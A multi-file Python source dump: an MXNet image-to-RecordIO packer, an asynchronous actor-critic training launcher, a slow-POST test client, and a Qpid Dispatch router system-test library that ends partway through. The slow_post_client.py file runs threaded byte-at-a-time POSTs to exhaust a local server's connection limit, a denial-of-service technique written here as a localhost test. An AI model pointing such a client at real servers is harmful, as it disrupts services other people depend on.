if count % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', count)
pre_time = cur_time
count += 1
def parse_args():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Create an image list or \
make a record database by reading from an image list')
parser.add_argument('prefix', help='prefix of input/output lst and rec files.')
#parser.add_argument('root', help='path to folder containing images.')
cgroup = parser.add_argument_group('Options for creating image lists')
cgroup.add_argument('--list', type=bool, default=False,
help='If this is set im2rec will create image list(s) by traversing root folder\
and output to <prefix>.lst.\
Otherwise im2rec will read <prefix>.lst and create a database at <prefix>.rec')
cgroup.add_argument('--exts', nargs='+', default=['.jpeg', '.jpg'],
help='list of acceptable image extensions.')
cgroup.add_argument('--chunks', type=int, default=1, help='number of chunks.')
cgroup.add_argument('--train-ratio', type=float, default=1.0,
help='Ratio of images to use for training.')
cgroup.add_argument('--test-ratio', type=float, default=0,
help='Ratio of images to use for testing.')
cgroup.add_argument('--recursive', type=bool, default=False,
help='If true recursively walk through subdirs and assign an unique label\
to images in each folder. Otherwise only include images in the root folder\
and give them label 0.')
cgroup.add_argument('--shuffle', type=bool, default=True, help='If this is set as True, \
im2rec will randomize the image order in <prefix>.lst')
rgroup = parser.add_argument_group('Options for creating database')
rgroup.add_argument('--quality', type=int, default=95,
help='JPEG quality for encoding, 1-100; or PNG compression for encoding, 1-9')
rgroup.add_argument('--num-thread', type=int, default=8,
help='number of thread to use for encoding. order of images will be different\
from the input list if >1. the input list will be modified to match the\
resulting order.')
rgroup.add_argument('--color', type=int, default=1, choices=[-1, 0, 1],
help='specify the color mode of the loaded image.\
1: Loads a color image. Any transparency of image will be neglected. It is the default flag.\
0: Loads image in grayscale mode.\
-1:Loads image as such including alpha channel.')
rgroup.add_argument('--encoding', type=str, default='.jpg', choices=['.jpg', '.png'],
help='specify the encoding of the images.')
rgroup.add_argument('--pack-label', type=bool, default=False,
help='Whether to also pack multi dimensional label in the record file')
args = parser.parse_args()
args.prefix = os.path.abspath(args.prefix)
#args.root = os.path.abspath(args.root)
return args
if __name__ == '__main__':
args = parse_args()
if args.list:
pass
#make_list(args)
else:
if os.path.isdir(args.prefix):
working_dir = args.prefix
else:
working_dir = os.path.dirname(args.prefix)
# prop = face_image.load_property(working_dir)
image_size = [224, 224] #prop.image_size
print('image_size', image_size)
args.image_h = image_size[0]
args.image_w = image_size[1]
files = [os.path.join(working_dir, fname) for fname in os.listdir(working_dir)
if os.path.isfile(os.path.join(working_dir, fname))]
count = 0
for fname in files:
if fname.startswith(args.prefix) and fname.endswith('.lst'):
print('Creating .rec file from', fname, 'in', working_dir)
count += 1
image_list = read_list(fname)
# -- write_record -- #
if args.num_thread > 1 and multiprocessing is not None:
q_in = [multiprocessing.Queue(1024) for i in range(args.num_thread)]
q_out = multiprocessing.Queue(1024)
read_process = [multiprocessing.Process(target=read_worker, args=(args, q_in[i], q_out)) \
for i in range(args.num_thread)]
for p in read_process:
p.start()
write_process = multiprocessing.Process(target=write_worker, args=(q_out, fname, working_dir))
write_process.start()
for i, item in enumerate(image_list):
q_in[i % len(q_in)].put((i, item))
for q in q_in:
q.put(None)
for p in read_process:
p.join()
q_out.put(None)
write_process.join()
else:
print('multiprocessing not available, fall back to single threaded encoding')
try:
import Queue as queue
except ImportError:
import queue
q_out = queue.Queue()
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
cnt = 0
pre_time = time.time()
for i, item in enumerate(image_list):
image_encode(args, i, item, q_out)
if q_out.empty():
continue
_, s, item = q_out.get()
#header, _ = mx.recordio.unpack(s)
#print('write header label', header.label)
record.write_idx(item[0], s)
if cnt % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', cnt)
pre_time = cur_time
cnt += 1
if not count:
print('Did not find and list file with prefix %s'%args.prefix)
|
main.py
|
from __future__ import print_function
import argparse
import os
import sys
import torch
import torch.optim as optim
import torch.multiprocessing as mp
import torch.nn as nn
import torch.nn.functional as F
from envs import create_atari_env
from train import train
from test import test
from utils import build_model
import my_optim
# Based on
# https://github.com/pytorch/examples/tree/master/mnist_hogwild
# Training settings
parser = argparse.ArgumentParser(description='Asynchronous AC and Art')
subparsers = parser.add_subparsers(dest='agent')
subparsers.required = True
ac_parser = subparsers.add_parser('ac', help='actor critic')
art_parser = subparsers.add_parser('art', help='art')
parser.add_argument('--lr', type=float, default=0.0001, metavar='LR',
help='learning rate (default: 0.0001)')
parser.add_argument('--gamma', type=float, default=0.99, metavar='G',
help='discount factor for rewards (default: 0.99)')
parser.add_argument('--tau', type=float, default=1.00, metavar='T',
help='parameter for GAE (default: 1.00)')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--num-processes', type=int, default=4, metavar='N',
help='how many training processes to use (default: 4)')
parser.add_argument('--max-episode-length', type=int, default=10000, metavar='M',
help='maximum length of an episode (default: 10000)')
parser.add_argument('--env-name', default='PongDeterministic-v4', metavar='ENV',
help='environment to train on (default: PongDeterministic-v4)')
parser.add_argument('--no-shared', default=False, metavar='O',
help='use an optimizer without shared momentum.')
ac_parser.add_argument('--num-steps', type=int, default=20, metavar='NS',
help='number of forward steps in A3C (default: 20)')
art_parser.add_argument('--dicho', action='store_true',
help='model decomposes value function dichotomically')
art_parser.add_argument('--remove-constant', action='store_true',
help='the value model learns a model of the form c * T'
'+ V')
art_subparsers = art_parser.add_subparsers(dest='lambda_type')
constant_art_parser = art_subparsers.add_parser('constant')
decaying_art_parser = art_subparsers.add_parser('decaying')
decaying_art_parser.add_argument('--alpha', default=3, metavar='A',
help='alpha parameter of art')
decaying_art_parser.add_argument('--L0', default=100, metavar='L0',
help='L0 parameter of art')
if __name__ == '__main__':
os.environ['OMP_NUM_THREADS'] = '1'
args = parser.parse_args()
torch.manual_seed(args.seed)
env = create_atari_env(args.env_name)
shared_model = build_model(env.observation_space.shape[0],
env.action_space, args)
shared_model.share_memory()
if args.no_shared:
optimizer = None
else:
optimizer = my_optim.SharedAdam(shared_model.parameters(), lr=args.lr)
optimizer.share_memory()
processes = []
p = mp.Process(target=test, args=(args.num_processes, args, shared_model))
p.start()
processes.append(p)
for rank in range(0, args.num_processes):
p = mp.Process(target=train, args=(args.agent, rank, args, shared_model, optimizer))
p.start()
processes.append(p)
try:
for p in processes:
p.join()
except KeyboardInterrupt:
print('\nmain thread interrupted\n')
|
slow_post_client.py
|
'''
'''
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import threading
import requests
import argparse
def gen(slow_time):
for _ in range(slow_time):
yield b'a'
time.sleep(1)
def slow_post(port, slow_time):
requests.post('http://127.0.0.1:{0}/'.format(port, ), data=gen(slow_time))
def makerequest(port, connection_limit):
client_timeout = 3
for _ in range(connection_limit):
t = threading.Thread(target=slow_post, args=(port, client_timeout + 10))
t.daemon = True
t.start()
time.sleep(1)
r = requests.get('http://127.0.0.1:{0}/'.format(port,))
print(r.status_code)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--port", "-p",
type=int,
help="Port to use")
parser.add_argument("--connectionlimit", "-c",
type=int,
help="connection limit")
args = parser.parse_args()
makerequest(args.port, args.connectionlimit)
if __name__ == '__main__':
main()
|
system_test.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
"""System test library, provides tools for tests that start multiple processes,
with special support for qdrouter processes.
Features:
- Create separate directories for each test.
- Save logs, sub-process output, core files etc.
- Automated clean-up after tests: kill sub-processes etc.
- Tools to manipulate qdrouter configuration files.
- Sundry other tools.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import errno
import sys
import time
import __main__
import functools
import os
import random
import re
import shutil
import socket
import subprocess
from copy import copy
from datetime import datetime
from subprocess import PIPE, STDOUT
try:
import queue as Queue # 3.x
except ImportError:
import Queue as Queue # 2.7
from threading import Thread
from threading import Event
import json
import uuid
import unittest
from proton import Message
from proton import Delivery
from proton.handlers import MessagingHandler
from proton.reactor import AtLeastOnce, Container
from proton.reactor import AtMostOnce
from qpid_dispatch.management.client import Node
from qpid_dispatch_internal.compat import dict_iteritems
# Optional modules
MISSING_MODULES = []
try:
import qpidtoollibs
except ImportError as err:
qpidtoollibs = None # pylint: disable=invalid-name
MISSING_MODULES.append(str(err))
try:
import qpid_messaging as qm
except ImportError as err:
qm = None # pylint: disable=invalid-name
MISSING_MODULES.append(str(err))
is_python2 = sys.version_info[0] == 2
def find_exe(program):
"""Find an executable in the system PATH"""
def is_exe(fpath):
"""True if fpath is executable"""
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
mydir = os.path.split(program)[0]
if mydir:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
# The directory where this module lives. Used to locate static configuration files etc.
DIR = os.path.dirname(__file__)
def _check_requirements():
"""If requirements are missing, return a message, else return empty string."""
missing = MISSING_MODULES
required_exes = ['qdrouterd']
missing += ["No exectuable %s" % e for e in required_exes if not find_exe(e)]
if missing:
return "%s: %s" % (__name__, ", ".join(missing))
MISSING_REQUIREMENTS = _check_requirements()
def retry_delay(deadline, delay, max_delay):
"""For internal use in retry. Sleep as required
and return the new delay or None if retry should time out"""
remaining = deadline - time.time()
if remaining <= 0:
return None
time.sleep(min(delay, remaining))
return min(delay * 2, max_delay)
# Valgrind significantly slows down the response time of the router, so use a
# long default timeout
TIMEOUT = float(os.environ.get("QPID_SYSTEM_TEST_TIMEOUT", 60))
def retry(function, timeout=TIMEOUT, delay=.001, max_delay=1):
"""Call function until it returns a true value or timeout expires.
Double the delay for each retry up to max_delay.
Returns what function returns or None if timeout expires.
"""
deadline = time.time() + timeout
while True:
ret = function()
if ret:
return ret
else:
delay = retry_delay(deadline, delay, max_delay)
if delay is None:
return None
def retry_exception(function, timeout=TIMEOUT, delay=.001, max_delay=1, exception_test=None):
"""Call function until it returns without exception or timeout expires.
Double the delay for each retry up to max_delay.
Calls exception_test with any exception raised by function, exception_test
may itself raise an exception to terminate the retry.
Returns what function returns if it succeeds before timeout.
Raises last exception raised by function on timeout.
"""
deadline = time.time() + timeout
while True:
try:
return function()
except Exception as e: # pylint: disable=broad-except
if exception_test:
exception_test(e)
delay = retry_delay(deadline, delay, max_delay)
if delay is None:
raise
def get_local_host_socket(protocol_family='IPv4'):
if protocol_family == 'IPv4':
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = '127.0.0.1'
elif protocol_family == 'IPv6':
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
host = '::1'
return s, host
def port_available(port, protocol_family='IPv4'):
"""Return true if connecting to host:port gives 'connection refused'."""
s, host = get_local_host_socket(protocol_family)
available = False
try:
s.connect((host, port))
except socket.error as e:
available = e.errno == errno.ECONNREFUSED
except:
pass
s.close()
return available
def wait_port(port, protocol_family='IPv4', **retry_kwargs):
"""Wait up to timeout for port (on host) to be connectable.
Takes same keyword arguments as retry to control the timeout"""
def check(e):
"""Only retry on connection refused"""
if not isinstance(e, socket.error) or not e.errno == errno.ECONNREFUSED:
raise
host = None
def connect():
# macOS gives EINVAL for all connection attempts after a ECONNREFUSED
# man 3 connect: "If connect() fails, the state of the socket is unspecified. [...]"
s, host = get_local_host_socket(protocol_family)
try:
s.connect((host, port))
finally:
s.close()
try:
retry_exception(connect, exception_test=check, **retry_kwargs)
except Exception as e:
raise Exception("wait_port timeout on host %s port %s: %s" % (host, port, e))
def wait_ports(ports, **retry_kwargs):
"""Wait up to timeout for all ports (on host) to be connectable.
Takes same keyword arguments as retry to control the timeout"""
for port, protocol_family in dict_iteritems(ports):
wait_port(port=port, protocol_family=protocol_family, **retry_kwargs)
def message(**properties):
"""Convenience to create a proton.Message with properties set"""
m = Message()
for name, value in dict_iteritems(properties):
getattr(m, name) # Raise exception if not a valid message attribute.
setattr(m, name, value)
return m
class Process(subprocess.Popen):
"""
Popen that can be torn down at the end of a TestCase and stores its output.
"""
# Expected states of a Process at teardown
RUNNING = -1 # Still running
EXIT_OK = 0 # Exit status 0
EXIT_FAIL = 1 # Exit status 1
unique_id = 0
@classmethod
def unique(cls, name):
cls.unique_id += 1
return "%s-%s" % (name, cls.unique_id)
def __init__(self, args, name=None, expect=EXIT_OK, **kwargs):
"""
Takes same arguments as subprocess.Popen. Some additional/special args:
@param expect: Raise error if process staus not as expected at end of test:
L{RUNNING} - expect still running.
L{EXIT_OK} - expect proces to have terminated with 0 exit status.
L{EXIT_FAIL} - expect proces to have terminated with exit status 1.
integer - expected return code
@keyword stdout: Defaults to the file name+".out"
@keyword stderr: Defaults to be the same as stdout
"""
self.name = name or os.path.basename(args[0])
self.args, self.expect = args, expect
self.outdir = os.getcwd()
self.outfile = os.path.abspath(self.unique(self.name))
self.torndown = False
with open(self.outfile + '.out', 'w') as out:
kwargs.setdefault('stdout', out)
kwargs.setdefault('stderr', subprocess.STDOUT)
try:
super(Process, self).__init__(args, **kwargs)
with open(self.outfile + '.cmd', 'w') as f:
f.write("%s\npid=%s\n" % (' '.join(args), self.pid))
except Exception as e:
raise Exception("subprocess.Popen(%s, %s) failed: %s: %s" %
(args, kwargs, type(e).__name__, e))
def assert_running(self):
"""Assert that the process is still running"""
assert self.poll() is None, "%s: exited" % ' '.join(self.args)
def teardown(self):
"""Check process status and stop the process if necessary"""
if self.torndown:
return
self.torndown = True
def error(msg):
with open(self.outfile + '.out') as f:
raise RuntimeError("Process %s error: %s\n%s\n%s\n>>>>\n%s<<<<" % (
self.pid, msg, ' '.join(self.args),
self.outfile + '.cmd', f.read()))
status = self.poll()
if status is None: # Still running
self.terminate()
if self.expect is not None and self.expect != Process.RUNNING:
error("still running")
self.expect = 0 # Expect clean exit after terminate
status = self.wait()
if self.expect is not None and self.expect != status:
error("exit code %s, expected %s" % (status, self.expect))
def wait(self, timeout=None):
"""
Add support for a timeout when using Python 2
"""
if timeout is None:
return super(Process, self).wait()
if is_python2:
start = time.time()
while True:
rc = super(Process, self).poll()
if rc is not None:
return rc
if time.time() - start >= timeout:
raise Exception("Process did not terminate")
time.sleep(0.1)
else:
return super(Process, self).wait(timeout=timeout)
def communicate(self, input=None, timeout=None):
"""
Add support for a timeout when using Python 2
"""
if timeout is None:
return super(Process, self).communicate(input=input)
if is_python2:
self.wait(timeout=timeout)
return super(Process, self).communicate(input=input)
return super(Process, self).communicate(input=input,
timeout=timeout)
class Config(object):
"""Base class for configuration objects that provide a convenient
way to create content for configuration files."""
def write(self, name, suffix=".conf"):
"""Write the config object to file name.suffix. Returns name.suffix."""
name = name + suffix
with open(name, 'w') as f:
f.write(str(self))
return name
class HttpServer(Process):
def __init__(self, args, name=None, expect=Process.RUNNING):
super(HttpServer, self).__init__(args, name=name, expect=expect)
# A HTTP2 Server that will respond to requests made via the router
class Http2Server(HttpServer):
def __init__(self, name=None, listen_port=None, wait=True,
py_string='python3', perform_teardown=True, cl_args=None,
server_file=None,
expect=Process.RUNNING):
self.name = name
self.listen_port = listen_port
self.ports_family = {self.listen_port: 'IPv4'}
self.py_string = py_string
self.cl_args = cl_args
self.perform_teardown = perform_teardown
self.server_file = server_file
self._wait_ready = False
self.args = ['/usr/bin/env', self.py_string, os.path.join(os.path.dirname(os.path.abspath(__file__)), self.server_file)]
if self.cl_args:
self.args += self.cl_args
super(Http2Server, self).__init__(self.args, name=name, expect=expect)
if wait:
self.wait_ready()
def wait_ready(self, **retry_kwargs):
"""
Wait for ports to be ready
"""
if not self._wait_ready:
self._wait_ready = True
self.wait_ports(**retry_kwargs)
def wait_ports(self, **retry_kwargs):
wait_ports(self.ports_family, **retry_kwargs)
class Qdrouterd(Process):
"""Run a Qpid Dispatch Router Daemon"""
class Config(list, Config):
"""
A router configuration.
The Config class is a list of tuples in the following format:
[ ('section-name', {attribute-map}), ...]
where attribute-map is a dictionary of key+value pairs. Key is an
attribute name (string), value can be any of [scalar | string | dict]
When written to a configuration file to be loaded by the router:
o) there is no ":' between the section-name and the opening brace
o) attribute keys are separated by a ":" from their values
o) attribute values that are scalar or string follow the ":" on the
same line.
o) attribute values do not have trailing commas
o) The section-name and attribute keywords are written
without enclosing quotes
o) string type attribute values are not enclosed in quotes
o) attribute values of type dict are written in their JSON representation.
Fills in some default values automatically, see Qdrouterd.DEFAULTS
"""
DEFAULTS = {
'listener': {'host': '0.0.0.0', 'saslMechanisms': 'ANONYMOUS', 'idleTimeoutSeconds': '120',
'authenticatePeer': 'no', 'role': 'normal'},
'connector': {'host': '127.0.0.1', 'saslMechanisms': 'ANONYMOUS', 'idleTimeoutSeconds': '120'},
'router': {'mode': 'standalone', 'id': 'QDR'}
}
def sections(self, name):
"""Return list of sections named name"""
return [p for n, p in self if n == name]
@property
def router_id(self): return self.sections("router")[0]["id"]
def defaults(self):
"""Fill in default values in gconfiguration"""
for name, props in self:
if name in Qdrouterd.Config.DEFAULTS:
for n, p in dict_iteritems(Qdrouterd.Config.DEFAULTS[name]):
props.setdefault(n, p)
def __str__(self):
"""Generate config file content. Calls default() first."""
def tabs(level):
if level:
return " " * level
return ""
def value(item, level):
if isinstance(item, dict):
result = "{\n"
result += "".join(["%s%s: %s,\n" % (tabs(level + 1),
json.dumps(k),
json.dumps(v))
for k, v in item.items()])
result += "%s}" % tabs(level)
return result
return "%s" % item
def attributes(e, level):
assert(isinstance(e, dict))
# k = attribute name
# v = string | scalar | dict
return "".join(["%s%s: %s\n" % (tabs(level),
k,
value(v, level + 1))
for k, v in dict_iteritems(e)])
self.defaults()
# top level list of tuples ('section-name', dict)
return "".join(["%s {\n%s}\n" % (n, attributes(p, 1)) for n, p in self])
def __init__(self, name=None, config=Config(), pyinclude=None, wait=True,
perform_teardown=True, cl_args=None, expect=Process.RUNNING):
"""
@param name: name used for for output files, default to id from config.
@param config: router configuration
@keyword wait: wait for router to be ready (call self.wait_ready())
"""
cl_args = cl_args or []
self.config = copy(config)
self.perform_teardown = perform_teardown
if not name:
name = self.config.router_id
assert name
# setup log and debug dump files
self.dumpfile = os.path.abspath('%s-qddebug.txt' % name)
self.config.sections('router')[0]['debugDumpFile'] = self.dumpfile
default_log = [l for l in config if (l[0] == 'log' and l[1]['module'] == 'DEFAULT')]
if not default_log:
self.logfile = "%s.log" % name
config.append(
('log', {'module': 'DEFAULT', 'enable': 'trace+',
'includeSource': 'true', 'outputFile': self.logfile}))
else:
self.logfile = default_log[0][1].get('outputfile')
args = ['qdrouterd', '-c', config.write(name)] + cl_args
env_home = os.environ.get('QPID_DISPATCH_HOME')
if pyinclude:
args += ['-I', pyinclude]
elif env_home:
args += ['-I', os.path.join(env_home, 'python')]
args = os.environ.get('QPID_DISPATCH_RUNNER', '').split() + args
super(Qdrouterd, self).__init__(args, name=name, expect=expect)
self._management = None
self._wait_ready = False
if wait:
self.wait_ready()
@property
def management(self):
"""Return a management agent proxy for this router"""
if not self._management:
self._management = Node.connect(self.addresses[0], timeout=TIMEOUT)
return self._management
def teardown(self):
if self._management:
try:
self._management.close()
except:
pass
self._management = None
if not self.perform_teardown:
return
teardown_exc = None
try:
super(Qdrouterd, self).teardown()
except Exception as exc:
# re-raise _after_ dumping all the state we can
teardown_exc = exc
def check_output_file(filename, description):
"""check router's debug dump file for anything interesting (should be
empty) and dump it to stderr for perusal by organic lifeforms"""
try:
if os.stat(filename).st_size > 0:
with open(filename) as f:
sys.stderr.write("\nRouter %s %s:\n>>>>\n" %
(self.config.router_id, description))
sys.stderr.write(f.read())
sys.stderr.write("\n<<<<\n")
sys.stderr.flush()
except OSError:
# failed to open file. This can happen when an individual test
# spawns a temporary router (i.e. not created as part of the
# TestCase setUpClass method) that gets cleaned up by the test.
pass
check_output_file(filename=self.outfile + '.out', description="output file")
check_output_file(filename=self.dumpfile, description="debug dump file")
if teardown_exc:
# teardown failed - possible router crash?
# dump extra stuff (command line, output, log)
def tail_file(fname, line_count=50):
"""Tail a file to a list"""
out = []
with open(fname) as f:
line = f.readline()
while line:
out.append(line)
if len(out) > line_count:
out.pop(0)
line = f.readline()
return out
try:
for fname in [("output", self.outfile + '.out'),
("command", self.outfile + '.cmd')]:
with open(fname[1]) as f:
sys.stderr.write("\nRouter %s %s file:\n>>>>\n" %
(self.config.router_id, fname[0]))
sys.stderr.write(f.read())
sys.stderr.write("\n<<<<\n")
if self.logfile:
sys.stderr.write("\nRouter %s log file tail:\n>>>>\n" %
self.config.router_id)
tail = tail_file(os.path.join(self.outdir, self.logfile))
for ln in tail:
sys.stderr.write("%s" % ln)
sys.stderr.write("\n<<<<\n")
sys.stderr.flush()
except OSError:
# ignore file not found in case test never opens these
pass
raise teardown_exc
@property
def ports_family(self):
"""
Return a dict of listener ports and the respective port family
Example -
{ 23456: 'IPv4', 243455: 'IPv6' }
"""
ports_fam = {}
for l in self.config.sections('listener'):
if l.get('protocolFamily'):
ports_fam[l['port']] = l['protocolFamily']
else:
ports_fam[l['port']] = 'IPv4'
return ports_fam
@property
def ports(self):
"""Return list of configured ports for all listeners"""
return [l['port'] for l in self.config.sections('listener')]
def _cfg_2_host_port(self, c):
host = c['host']
port = c['port']
protocol_family = c.get('protocolFamily', 'IPv4')
if protocol_family == 'IPv6':
return "[%s]:%s" % (host, port)
elif protocol_family == 'IPv4':
return "%s:%s" % (host, port)
raise Exception("Unknown protocol family: %s" % protocol_family)
@property
def http_addresses(self):
"""Return http://host:port addresses for all http listeners"""
cfg = self.config.sections('httpListener')
return ["http://%s" % self._cfg_2_host_port(l) for l in cfg]
@property
def addresses(self):
"""Return amqp://host:port addresses for all listeners"""
cfg = self.config.sections('listener')
return ["amqp://%s" % self._cfg_2_host_port(l) for l in cfg]
@property
def connector_addresses(self):
"""Return list of amqp://host:port for all connectors"""
cfg = self.config.sections('connector')
return ["amqp://%s" % self._cfg_2_host_port(c) for c in cfg]
@property
def hostports(self):
"""Return host:port for all listeners"""
return [self._cfg_2_host_port(l) for l in self.config.sections('listener')]
def is_connected(self, port, host='127.0.0.1'):
"""If router has a connection to host:port:identity return the management info.
Otherwise return None"""
try:
ret_val = False
response = self.management.query(type="org.apache.qpid.dispatch.connection")
index_host = response.attribute_names.index('host')
for result in response.results:
outs = '%s:%s' % (host, port)
if result[index_host] == outs:
ret_val = True
return ret_val
except:
return False
def wait_address(self, address, subscribers=0, remotes=0, containers=0,
count=1, **retry_kwargs):
"""
Wait for an address to be visible on the router.
@keyword subscribers: Wait till subscriberCount >= subscribers
@keyword remotes: Wait till remoteCount >= remotes
@keyword containers: Wait till containerCount >= remotes
@keyword count: Wait until >= count matching addresses are found
@param retry_kwargs: keyword args for L{retry}
"""
def check():
# TODO aconway 2014-06-12: this should be a request by name, not a query.
# Need to rationalize addresses in management attributes.
# endswith check is because of M0/L/R prefixes
addrs = self.management.query(
type='org.apache.qpid.dispatch.router.address',
attribute_names=[u'name', u'subscriberCount', u'remoteCount', u'containerCount']).get_entities()
addrs = [a for a in addrs if a['name'].endswith(address)]
return (len(addrs) >= count
and addrs[0]['subscriberCount'] >= subscribers
and addrs[0]['remoteCount'] >= remotes
and addrs[0]['containerCount'] >= containers)
assert retry(check, **retry_kwargs)
def wait_address_unsubscribed(self, address, **retry_kwargs):
"""
Block until address has no subscribers
"""
a_type = 'org.apache.qpid.dispatch.router.address'
def check():
addrs = self.management.query(a_type).get_dicts()
rc = list(filter(lambda a: a['name'].find(address) != -1,
addrs))
count = 0
for a in rc:
count += a['subscriberCount']
count += a['remoteCount']
count += a['containerCount']
return count == 0
assert retry(check, **retry_kwargs)
def get_host(self, protocol_family):
if protocol_family == 'IPv4':
return '127.0.0.1'
elif protocol_family == 'IPv6':
return '::1'
else:
return '127.0.0.1'
def wait_ports(self, **retry_kwargs):
wait_ports(self.ports_family, **retry_kwargs)
def wait_connectors(self, **retry_kwargs):
"""
Wait for all connectors to be connected
@param retry_kwargs: keyword args for L{retry}
"""
for c in self.config.sections('connector'):
assert retry(lambda: self.is_connected(port=c['port'], host=self.get_host(c.get('protocolFamily'))),
**retry_kwargs), "Port not connected %s" % c['port']
def wait_ready(self, **retry_kwargs):
"""Wait for ports and connectors to be ready"""
if not self._wait_ready:
self._wait_ready = True
self.wait_ports(**retry_kwargs)
self.wait_connectors(**retry_kwargs)
return self
def is_router_connected(self, router_id, **retry_kwargs):
try:
self.management.read(identity="router.node/%s" % router_id)
# TODO aconway 2015-01-29: The above check should be enough, we
# should not advertise a remote router in managment till it is fully
# connected. However we still get a race where the router is not
# actually ready for traffic. Investigate.
# Meantime the following actually tests send-thru to the router.
node = Node.connect(self.addresses[0], router_id, timeout=1)
return retry_exception(lambda: node.query('org.apache.qpid.dispatch.router'))
except:
return False
def wait_router_connected(self, router_id, **retry_kwargs):
retry(lambda: self.is_router_connected(router_id), **retry_kwargs)
@property
def logfile_path(self):
return os.path.join(self.outdir, self.logfile)
class Tester(object):
"""Tools for use by TestCase
- Create a directory for the test.
- Utilities to create processes and servers, manage ports etc.
- Clean up processes on teardown"""
# Top level directory above any Tester directories.
# CMake-generated configuration may be found here.
top_dir = os.getcwd()
# The root directory for Tester directories, under top_dir
root_dir = os.path.abspath(__name__ + '.dir')
def __init__(self, id):
"""
@param id: module.class.method or False if no directory should be created
"""
self.directory = os.path.join(self.root_dir, *id.split('.')) if id else None
self.cleanup_list = []
def rmtree(self):
"""Remove old test class results directory"""
if self.directory:
shutil.rmtree(os.path.dirname(self.directory), ignore_errors=True)
def setup(self):
"""Called from test setup and class setup."""
if self.directory:
os.makedirs(self.directory)
os.chdir(self.directory)
def teardown(self):
"""Clean up (tear-down, stop or close) objects recorded via cleanup()"""
self.cleanup_list.reverse()
errors = []
for obj in self.cleanup_list:
try:
for method in ["teardown", "tearDown", "stop", "close"]:
cleanup = getattr(obj, method, None)
if cleanup:
cleanup()
break
except Exception as exc:
errors.append(exc)
if errors:
raise RuntimeError("Errors during teardown: \n\n%s" % "\n\n".join([str(e) for e in errors]))
def cleanup(self, x):
"""Record object x for clean-up during tear-down.
x should have on of the methods teardown, tearDown, stop or close"""
self.cleanup_list.append(x)
return x
def popen(self, *args, **kwargs):
"""Start a Process that will be cleaned up on teardown"""
return self.cleanup(Process(*args, **kwargs))
def qdrouterd(self, *args, **kwargs):
"""Return a Qdrouterd that will be cleaned up on teardown"""
return self.cleanup(Qdrouterd(*args, **kwargs))
def http2server(self, *args, **kwargs):
return self.cleanup(Http2Server(*args, **kwargs))
port_range = (20000, 30000)
next_port = random.randint(port_range[0], port_range[1])
@classmethod
def get_port(cls, protocol_family='IPv4'):
"""Get an unused port"""
def advance():
"""Advance with wrap-around"""
cls.next_port += 1
if cls.next_port >= cls.port_range[1]:
cls.next_port = cls.port_range[0]
start = cls.next_port
while not port_available(cls.next_port, protocol_family):
advance()
if cls.next_port == start:
raise Exception("No available ports in range %s", cls.port_range)
p = cls.next_port
advance()
return p
class TestCase(unittest.TestCase, Tester): # pylint: disable=too-many-public-methods
"""A TestCase that sets up its own working directory and is also a Tester."""
def __init__(self, test_method):
unittest.TestCase.__init__(self, test_method)
Tester.__init__(self, self.id())
@classmethod
def setUpClass(cls):
cls.maxDiff = None
cls.tester = Tester('.'.join([cls.__module__, cls.__name__, 'setUpClass']))
cls.tester.rmtree()
cls.tester.setup()
@classmethod
def tearDownClass(cls):
if hasattr(cls, 'tester'):
cls.tester.teardown()
del cls.tester
def setUp(self):
Tester.setup(self)
def tearDown(self):
Tester.teardown(self)
def assert_fair(self, seq):
avg = sum(seq) / len(seq)
for i in seq:
assert i > avg / 2, "Work not fairly distributed: %s" % seq
if not hasattr(unittest.TestCase, 'assertRegex'):
def assertRegex(self, text, regexp, msg=None):
assert re.search(regexp, text), msg or "Can't find %r in '%s'" % (regexp, text)
if not hasattr(unittest.TestCase, 'assertNotRegex'):
def assertNotRegex(self, text, regexp, msg=None):
assert not re.search(regexp, text), msg or "Found %r in '%s'" % (regexp, text)
class SkipIfNeeded(object):
"""
Decorator class that can be used along with test methods
to provide skip test behavior when using both python2.6 or
a greater version.
This decorator can be used in test methods and a boolean
condition must be provided (skip parameter) to define whether
or not the test will be skipped.
"""
def __init__(self, skip, reason):
"""
:param skip: if True the method wont be called
:param reason: reason why test was skipped
"""
self.skip = skip
self.reason = reason
def __call__(self, f):
@functools.wraps(f)
def wrap(*args, **kwargs):
"""
Wraps original test method's invocation and dictates whether or
not the test will be executed based on value (boolean) of the
skip parameter.
When running test with python < 2.7, if the "skip" parameter is
true, the original method won't be called. If running python >= 2.7, then
skipTest will be called with given "reason" and original method
will be invoked.
:param args:
:return:
"""
instance = args[0]
if self.skip:
instance.skipTest(self.reason)
return f(*args, **kwargs)
return wrap
def main_module():
